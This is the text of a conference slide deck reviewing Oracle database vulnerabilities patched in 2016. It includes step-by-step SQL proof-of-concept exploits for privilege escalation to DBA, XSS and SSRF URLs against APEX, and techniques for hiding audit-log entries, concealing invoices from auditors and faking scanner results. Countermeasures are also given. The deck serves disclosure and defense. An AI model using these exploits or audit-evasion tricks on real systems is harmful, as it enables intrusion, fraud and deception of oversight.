Best of Oracle Security 2016

What happened in 2016?

Oracle Backdoor & NSA

"Kaspersky report notes that somewhere in mid

2002 or 2003, Equation Group members (=NSA
Hacker Team) used the Oracle database
installation CD to infect multiple targets with
malware from the group’s extensive library.“ *

* * http://www.techworm.net/2015/02/equation-group-nsa-backdoor-in-hardware-30-countries.html
Agenda

¡ Intro
¡ January 2016 - November 2016
¡ Outlook 2017
¡ Q&A
Introduction

What will be shown in the next 45 minutes?

¡ Oracle Security Patches
¡ Modify SQL statements & Application Logic
¡ Outlook 2017
Oracle Patches
Database Vulnerabilities and CPU

Patch situation is getting better but Oracle 12c

offers a large, new playground (=tons of new
features) for security researchers
Problem: Just a few people are doing security
research in the database
Nearly 50% of the database vulnerabilities were
found/reported by 2 researchers (David
Litchfield & Alexander Kornbrust)
Oracle Vulnerabilities 2016
 Oracle Vulnerabilities 2016

Number of vulnerabilities in Oracle database increasing again

¡ 30 findings in 2016 (2015: 29, 2014: 43, 2013: 13 2012: 17)

¡ 8 remote exploitable bugs (2015:3, 2014: 4, 2013: 7, 2012: 8 )

• January 2016 CPU (7 Vulnerabilities – 0 remote)

• April 2016 CPU (5 Vulnerabilities – 2 remote)
• July 2016 CPU (9 Vulnerabilities – 5 remote)
• October 2016 CPU (9 Vulnerabilities – 1 remote)
2016
 January 2016

Oracle CPU January 2016 *

Exploiting the Oracle Workspace Manager SQL
Race Condition (David Litchfield) **
DB Database Assessment Tool ***

* * http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html
* ** http://www.davidlitchfield.com/ExploitingtheOracleWorkspaceManagerSQLRaceCondition.pdf
* *** https://github.com/foospidy/DbDat
January 2016 CPU*

7 security fixes (No remote exploitable)

1 Java VM (CVSS 9.0)

1 Workspace Manager (CVSS 6.5)

2 XML Database (CVSS 5.5, 4.0)

1 Database Vault (CVSS 4.0)

1 Security (CVSS 4.0)

1 XML Developer’s Kit (CVSS 4.0)

* http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html
Jan 2016 CPU- CVE-2016-0467

Problem: Oracle native auditing fails to capture

„Create Java Source“
Reporter: David Litchfield*
Exploit: obvious, Create Java Source…

* http://www.davidlitchfield.com/DetailsforOraclesJanuary2016CPU.pdf
Jan 2016 CPU- CVE-2015-4921

Problem: Status is incorrectly reported if SYS

Auditing is used together with DB Vault
Reporter: David Litchfield*

* http://www.davidlitchfield.com/DetailsforOraclesJanuary2016CPU.pdf
Jan 2016 CPU- CVE-2015-4925
Problem: Privilege escalation via Race Condition
in WMSYS.LT.COPYFORUPDATE
Reporter: David Litchfield*

The Oracle Workspace Manager allows a user to version enable

database tables. This is achieved by creating workspaces which contain
the versioned data. The Workspace Manager contains a number of PL/
SQL packages that are used to manage workspaces. To function
correctly some management actions must be performed with higher
privileges than a normal user might have and so to enable this, some of
the management functions execute with the privileges of the WMSYS user.
The main workspace manager interface is the LT PL/SQL package and
this executes with the privileges of the user that calls or invokes LT. When
privileged work is required to be executed LT calls the LTADM package.
The LTADM package executes with the privileges of the owner or definer,
in this case WMSYS. WMSYS has a number of very powerful privileges such
as CREATE ANY TRIGGER that allows the grantee the privilege to create a
trigger in any schema, with the exception of the SYS schema.

* http://www.davidlitchfield.com/DetailsforOraclesJanuary2016CPU.pdf
 Jan 2016 CPU- CVE-2015-4925
SELECT COUNT(*) INTO CNT

FROM V$OPEN_CURSOR OC, V$SQL S, V$OBJECT_DEPENDENCY OD WHERE OC.SID =
USER_SID AND

[…] AND

OD.TO_TYPE IN (7,8,9,11) ;

Here, OD.TO_TYPEs 7,8,9 and 11 are functions, procedures, packages and objects. If any
such dependency exists then the user supplied query will not be executed and an error
is raised:
IF (CNT>0) THEN WMSYS.WM_ERROR.RAISEERROR(WMSYS.LT.WM_ERROR_81_NO); END IF ;

SQL_STR2 :=

'declare

delstatuses wmsys.ltUtil.number_tab ;

begin

select WM_delstatus bulk collect into delstatuses

from ' || WMSYS.LTUTIL.GETVN(TABLE_OWNER, TAB_NAME, '_BASE') || ' where
WM_version = ' || CURVER || ' and ' || NEWWHERE_CLAUSE || ' for update;

end;' ;

WMSYS.LTADM.EXECSQL(SQL_STR2) ;
 Jan 2016 CPU- CVE-2015-4925
SQL> CONNECT RACER/PASSWORD



SQL> CREATE TABLE FOO(X NUMBER, CONSTRAINT X_PK PRIMARY KEY(X));


SQL> INSERT INTO FOO (X) VALUES (1);



SQL> COMMIT;



SQL> EXEC WMSYS.LT.ENABLEVERSIONING(‚FOO');

SQL> create or replace function Y return number authid current_user is

2 pragma autonomous_transaction;

3 begin

4 dbms_output.put_line('BANG!');

5 execute immediate 'create or replace procedure owned(p varchar)
is begin execute immediate p; end;';

6 execute immediate 'grant execute on owned to public';

7 dbms_output.put_line(sys_context('userenv','current_user')); 8 return 1;

9 end;
10 /



 Jan 2016 CPU- CVE-2015-4925
SQL> GRANT EXECUTE ON Y TO PUBLIC;
SQL> CREATE TABLE RACER(Y NUMBER);
SQL> INSERT INTO RACER(Y) VALUES (1);
SQL> COMMIT;


SQL> create or replace procedure attempt_it is 


2 begin 

3 execute immediate 'BEGIN WMSYS.LT.COPYFORUPDATE(''FOO'',''X=LENGTH((SELECT 1
FROM RACER.RACER WHERE RACER.Y=1))''); END;'; 

4 exception when others then 5 null;

6 end;

7/
SQL> declare

2 i number:=0; 

3 begin

4  for i in 1..1000 loop 

5  execute immediate 'alter table RACER.RACER rename column Y to Z';

6 execute immediate 'alter table RACER.RACER rename column Z to Y';

7 end loop; 

8 end;

9/
 Jan 2016 CPU- CVE-2015-4925

SQL> DESC WMSYS.OWNED

PROCEDURE WMSYS.OWNED
Argument Name Type In/Out Default?
———————————————————————————————-
P VARCHAR2 IN
February 2016

nothing special happened

March 2016

nothing special happened

April 2016

Oracle CPU April 2016*

* * http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html
April 2016 CPU*

5 security fixes (2 remote exploitable)

1 Java VM (CVSS 9.0)

1 OLAP (CVSS 7.8)

3 RDBMS Security (CVSS 5.9, 3.3, 3.3, 1 remote)

* http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html
Apr 2016 CPU- CVE-2016-0690
Problem: AUDIT NOT EXISTS fails to capture
attempts to execute a procedure that does not
exist either because the user does not have the
execute privilege on it or because the
procedure does not exist. If a DBA wants to
capture attempts to execute procedures where
the user does not have the execute privilege we
must also add:
Reporter: David Litchfield*
Exploit:

AUDIT EXECUTE PROCEDURE WHENEVER NOT SUCCESSFUL;*

* http://www.davidlitchfield.com/OracleCPUApril2016.pdf
Apr 2016 CPU- CVE-2016-0691
Problem: A "missing" (due to no execute
privilege) function is within a SELECT query the
name of the function is not logged but the
name of the table in the query
Reporter: David Litchfield*
Exploit: obvious, Create Java Source…

* http://www.davidlitchfield.com/OracleCPUApril2016.pdf
May 2016

Nothing special happened

June 2016

Nothing special happened

 July 2016

Oracle CPU July 2016 *

* * http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html
 July 2016

Oracle CPU July 2016 *

* * http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html
July 2016 CPU*
9 security fixes (5 remote exploitable)

1 OJVM (CVSS 9.0)

1 JDBC (CVSS 8.1, remote)

1 Portable Clusterware (CVSS 7.5, remote)

1 Data Pump (CVSS 6.7)

2 APEX (CVSS 6.1, 5.8, 2 remote)

1 RDBMS Security (CVSS 5.3, remote)

DB Shardening (CVSS 4.4)

1 Database Vault (CVSS 3.4)

* http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html
Jul 2016 CPU- CVE-2016-3448
Problem: The HTMLDB_UTIL PL/SQL package is
vulnerable to a XSS flaw. To access it the
schema (APEX_050000) needs to be specified
first however because the config file whitelists
apex*
Reporter: David Litchfield*
Exploit:

http://example.com/ords/
apex_050000.htmldb_util.JSON_FROM_ARRAY?P_COLS=1&P_NAM
E01=XX%22%3E%3CH1%3EOops%3C/H1%3E&P_F01=Y&P_ROWS=1

* http://www.davidlitchfield.com/OracleCPUApril2016.pdf
Jul 2016 CPU- CVE-2016-3467
Problem: Apex 5 is vulnerable to a server side
request forgery flaw i.e. it can be made to connect
to another web server and port regardless of
whether "allowed URLs" have been configured. For
example the request below will connect to
"someotherserver" on port and POST X as a payload.
This can be used as a port scanning mechanism,
used to attack systems protected by a firewall etc,
Reporter: David Litchfield*
Exploit:

http://example/ords/
apex_050000.WWV_FLOW_WEBSERVICES_API.MAKE_REQUEST?P_U
RL=http://someotherserver:port&p_envelope=X

* http://www.davidlitchfield.com/OracleCPUApril2016.pdf
Apr 2016 CPU- CVE-2016-3488
Problem: Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter: Bruno Cirone
Exploit:

exec gsmadmin_internal.dbms_gsm_common.setdbparameter
('O7_DICTIONARY_ACCESSIBILITY','TRUE')
 Jul 2016 CPU- CVE-2016-3488
— as SYS

SQL> select name,value from v$parameter where
name='O7_DICTIONARY_ACCESSIBILITY';
 
O7_DICTIONARY_ACCESSIBILITY FALSE
 
 
-- as user GSMUSER
SQL> exec gsmadmin_internal.dbms_gsm_common.setdbparameter
('O7_DICTIONARY_ACCESSIBILITY','TRUE')
 
PL/SQL-Prozedur erfolgreich abgeschlossen.
 
 
-- as user SYS :-Re-Run again after execution of the package
 
SQL> select name,value from v$parameter where
name='O7_DICTIONARY_ACCESSIBILITY';
 
O7_DICTIONARY_ACCESSIBILITY TRUE



 July 2016 CPU- CVE-2016-3484
Problem: SYS CAN INFLUENCE DVSYS-ANALYSIS

Reporter: Alexander Kornbrust

Problem: (Details + Exploit later….)

FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS

TMP VARCHAR2(32767);
TMP2 VARCHAR2(32767);


BEGIN
SELECT DVSYS.DV_SQL_TEXT INTO TMP FROM DUAL;

IF LENGTH(TMP) = 4000 THEN RETURN ’N'; END IF;

TMP2 := UPPER(TMP);

IF (TMP2) LIKE '%RECYCLEBIN%' AND (TMP2) LIKE '%ON%' THEN RETURN 'N'; END IF;
RETURN 'Y';
END;
July 2016 CPU- CVE-2016-3489
Problem: Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter: Alexander Kornbrust
 July 2016 CPU- CVE-2016-3489

— Oracle 11.2.0.4
SYSTEM@SQL> select grantee, owner, table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE =
'INDEX'  AND GRANTEE!=OWNER  and owner='SYS' ;
 
GRANTEE                        OWNER TABLE_NAME
--------------------------------------------------------------------------------------
SYSTEM                         SYS INCEXP
SYSTEM                         SYS INCFIL
SYSTEM                         SYS INCVID
 
SYSTEM@SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR
DETERMINISTIC AUTHID CURRENT_USER IS
  2   PRAGMA AUTONOMOUS_TRANSACTION;
  3   BEGIN
  4   execute immediate 'grant select on sys.link$ to public';
  5   COMMIT;
  6   RETURN 'FOO';
  7   END;  /

SQL>  grant execute on getdba to public;

 July 2016 CPU- CVE-2016-3489
==> System does not have access to the SYS.LINK$ table
SQL> select count(*) from sys.link$;
ERROR at line 1:
ORA-01031: insufficient privileges

==> also the execution of getdba throws an error


SQL> select getdba('i') from dual;
ERROR at line 1:
ORA-01031: insufficient privileges
ORA-06512: at "SYSTEM.GETDBA", line 4

==> Now create an index on the table sys.incvid using a function based index
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(SYSTEM.GETDBA('AK'));

Index created.

SQL> select count(*) from sys.link$;

COUNT(*)
----------
11
 July 2016 CPU- CVE-2016-3489
-- Oracle 12.1.0.2 (SYSTEM does no longer have INHERIT ANY PRIVILEGE)
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCvid(SYSTEM.GETDBA('1'));
CREATE INDEX EXPLOIT_INDEX ON SYS.INCvid(SYSTEM.GETDBA('1'))
*
FEHLER in Zeile 1:
ORA-06598: Nicht ausreichende INHERIT PRIVILEGES-Berechtigung
ORA-06512: in "SYSTEM.GETDBA", Zeile 1

-- On 12.1.0.2 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the
-- CREATE ANY PROCEDURE to create a function in the schema of WMSYS

CREATE OR REPLACE FUNCTION wmsys.GETDBA(FOO VARCHAR) RETURN VARCHAR

DETERMINISTIC AUTHID CURRENT_USER IS
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
execute immediate 'grant select on sys.link$ to public'; COMMIT;
RETURN 'FOO';
END; /


SQL> grant execute on wmsys.getdba to public;

-- now we create the index

SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(WMSYS.GETDBA('AK'));
 August 2016
Hackproofing Oracle’s eBusiness Suite by David
Litchfield*

* Presentation + Supporting documents


https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf


https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5.pdf
September 2016
¡ Nothing special happened

* x
October 2016

Oracle CPU October 2016 *

* http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html
October 2016 CPU*

9 security fixes (1 remote exploitable)

1 OJVM (CVSS 9.1)

2 KernelPDB (CVSS 6.4,6.0)

3 RDBMS Security (CVSS 6.4, 3.3, 3.3)

1 APEX (CVSS 6.1, remote)

1 RDBMS Security & SQL*Plus (CVSS 2.4)


* http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html
Oct 2016 CPU- CVE-2016-5497
Problem: UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter: Alexander Kornbrust
Oracle Password Hash 12.1.0.2+

Oracle 12.1.0.2 introduced a new PBKDF2/

SHA512 based algorithm
The new T: Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark: Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12.1.0.2+

Let’s have a look at the RFC2617

KD(secret, data) = H(concat(secret, ":", data))
No salt but a secret

Secret= 'XDB‘
and the hash will be



MD5(XDB:tiger)


and stored in the spare4-column starting with the

H:Hash
Oct 2016 CPU- CVE-2016-5516

Problem: In Oracle 12c, the DBMS_PDB_EXEC_SQL

procedure is a wrapper for the
DBMS_PDB.EXEC_AS_ORACLE_SCRIPT procedure
which executes SQL as the SYS user. 

The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and, as such, by first exploiting
a vulnerability in a publicly executable XDB owned
PL/SQL object, an attacker can leverage this
privilege to execute SQL as SYS. The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model.
Reporter: David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem: Privilege Escalation in Oracle Cloud
Control (12/13)
Reporter: Alexander Kornbrust
sqlplus sysman_apm/rdsora1
SQL>desc dba_users
ERROR:
ORA-04043: object "SYS"."DBA_USERS" does not exist

==> user does not have the privilege to access DBA_USERS

SQL>select * from user_sys_privs;

USERNAME PRIVILEGE ADM
------------------------------ ---------------------------------------- ---
SYSMAN_APM UNLIMITED TABLESPACE NO
SYSMAN_APM CREATE VIEW NO
SYSMAN_APM CREATE ANY LIBRARY NO
SYSMAN_APM CREATE SEQUENCE NO
SYSMAN_APM CREATE TABLE NO
SYSMAN_APM CREATE LIBRARY NO
SYSMAN_APM CREATE ANY INDEX NO

==> CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM

SQL>select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYSMAN_APM CONNECT NO YES NO
SYSMAN_APM RESOURCE NO YES NO
 ==> Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER
SQL>CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR
DETERMINISTIC AUTHID CURRENT_USER IS
2 PRAGMA AUTONOMOUS_TRANSACTION;
3 BEGIN
4 execute immediate 'grant dba to public';
5 COMMIT;
6 RETURN 'FOO';
7 END;
8 /

==> Grant execution privileges to PUBLIC

SQL> grant execute on getdba to public;

==> Create an index on SYSTEM.HELP using a function based index (FBI). The function
getdba is used for the function based index.
SQL> CREATE INDEX EXPLOIT_INDEX ON SYSTEM.HELP(SYSMAN_APM.GETDBA('AK2'));

==> Reconnect is necessary

SQL> select * from dba_role_privs where granted_role='DBA' and grantee='PUBLIC';

GRANTEE GRANTED_ROLE ADM DEF

------------------------------ ------------------------------ --- ---
PUBLIC DBA NO YES
November 2016

DOAG 2016
Modifying SQL
Statements and
Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks you:

„Tomorrow the auditor from the tax authority will
come to check our invoices. Could you hide the
10.000 EUR invoice just from the auditor from the
last party at the night club?



I will increase your salary….“
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (e.g.
Splunk, QRadar, …) via JDBC
Scenario 3
You don’t have time to harden all your
databases but the security department wants to
see results.

Instead of fixing the problem you will just deliver
the proper results
A lot of different wishes…

but luckily we are using

Oracle.
Problem&Solution
Oracle offers different features to fulfill these
wishes without affecting other users…

All these scenarios have in common that we

have to manipulate SQL statement
Select value …

Oracle Data Redaction allows to mask /

manipulate the selected data just for a single
database user
Possible Usage:

replace true/false

replace USER/ADMIN

…
the DBA can decide what will be returned
Select value …

A typical query from security checklists/scanner looks

like this



select upper(value) from parameter where
upper(name) = 'XYZ';


The tool expects the value TRUE, but it contains FALSE.


Oracle data redaction allows you to change the

result value from FALSE to TRUE.



==> Audit department is happy because the
database passes all the security checks…
… from table/view …

Modifying objects can change be used as man

in the middle as well
Possible approaches:
modify views (e.g. add spare!='DBA1' to the
view dba_audit_trail)

All entries of the OSUSER DBA1 will be removed
in the view. If a SIEM solution retrieves the audit
data, stuff from DBA1 is not retrieved
create or change synonyms to „redirect“
objects
replace table with view/instead of trigger
 SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL

————— dbms_macadm—————
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS
TMP VARCHAR2(32767);
TMP2 VARCHAR2(32767);


BEGIN
SELECT DVSYS.DV_SQL_TEXT INTO TMP FROM DUAL;

IF LENGTH(TMP) = 4000 THEN RETURN ’N'; END IF;

TMP2 := UPPER(TMP);

IF (TMP2) LIKE '%RECYCLEBIN%' AND (TMP2) LIKE '%ON%' THEN RETURN 'N'; END IF;
RETURN 'Y';
END;

SQL> create or replace view mydual 


as select 'X' as dummy from dual where user!='DVSYS';


SQL> grant select on sys.mydual to public;

SQL> drop public synonym dual;


SQL> create public synonym dual for sys.mydual;
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
… where x=y

where conditions can be changed using VPD

VPD: add where clause

invoice_name != 'SAUNA_CLUB CHANTAL'
Hide „certain“ invoices from the audit
department
Select value from table/view where x=y

SQL Translation Framework (12c only) allows to

replace an entire query



User submits

Query A



SQL Translation Framework replaces Query A
with

Query B
Possible Countermeasures for paranoid
Auditors

Add a random string, e.g. /* aksdjhiuz */ to avoid

SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms

(e.g. SYS.DUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(e.g. alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (e.g. DB Vault)
DBAs and Auditors/Security Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 12.2
required (new features, new packages, …)

Migration to 12.2

More auditing projects


Integration Auditing with SIEM solutions

Q&A
Thank you
Contact:
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany